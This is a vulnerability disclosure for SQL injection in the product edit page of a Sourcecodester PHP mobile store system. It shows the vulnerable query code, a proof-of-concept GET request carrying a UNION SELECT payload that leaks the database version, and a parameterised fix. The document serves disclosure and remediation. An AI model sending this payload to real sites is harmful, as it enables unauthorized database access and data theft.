# Sourcecodester / Mobile Management Store - SQL Injection

## Vendor Homepage

https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html

## Affected Component

`/admin/product/manage_product.php`

## Code

The vulnerable lookup in `manage_product.php`: the `id` request parameter is interpolated directly into the SQL string, and the `> 0` guard does not reject a string such as `1'...` because PHP's loose comparison still evaluates it as greater than zero.

```php
<?php
if(isset($_GET['id']) && $_GET['id'] > 0){
    // User-controlled `id` is concatenated into the query text; a single quote
    // in the value terminates the string literal and the rest becomes SQL.
    $qry = $conn->query("SELECT * from `products` where id = '{$_GET['id']}' ");
    if($qry->num_rows > 0){
        // Each column of the selected row becomes a like-named variable.
        foreach($qry->fetch_assoc() as $k => $v){
            $$k=stripslashes($v);
        }
    }
}
?>
```

## Proof of Concept

### HTTP Request Example

```http
GET /mobile_store/admin/?page=product/manage_product&id=1'+AND+FALSE+UNION+SELECT+1,2,3,4,version(),6,7,8--+- HTTP/1.1
Host: [REDACTED]
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
```
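A hardened replacement for the lookup, added here as an example and not code from the Sourcecodester project; it assumes `$conn` is the application's mysqli connection (as in the affected snippet) and that `products`.`id` is an integer column:

```php
<?php
// Added example, not the project's code: parameterised version of the
// manage_product.php lookup. Assumes $conn is the app's mysqli connection
// and that `products`.`id` is an integer column.

// FILTER_VALIDATE_INT yields false for a value such as
// "1' AND FALSE UNION SELECT ..." and null when `id` is absent, whereas the
// original `$_GET['id'] > 0` check let that string through.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, [
    'options' => ['min_range' => 1],
]);

if ($id !== null && $id !== false) {
    // The value is bound as a parameter and never becomes part of the SQL
    // text, so it cannot close the quote and append a UNION.
    $stmt = $conn->prepare("SELECT * FROM `products` WHERE `id` = ?");
    if ($stmt === false) {
        error_log("manage_product: prepare failed: " . $conn->error);
        exit;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $result = $stmt->get_result(); // needs the mysqlnd driver
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();

    if ($row !== null) {
        // Kept from the original: copy row columns into like-named variables.
        // $$k lets column names overwrite any variable in scope; an explicit
        // allow-list of expected columns would be the stricter form.
        foreach ($row as $k => $v) {
            $$k = stripslashes($v);
        }
    }
}
?>
```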

## CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

## Credits

Russel James Avenido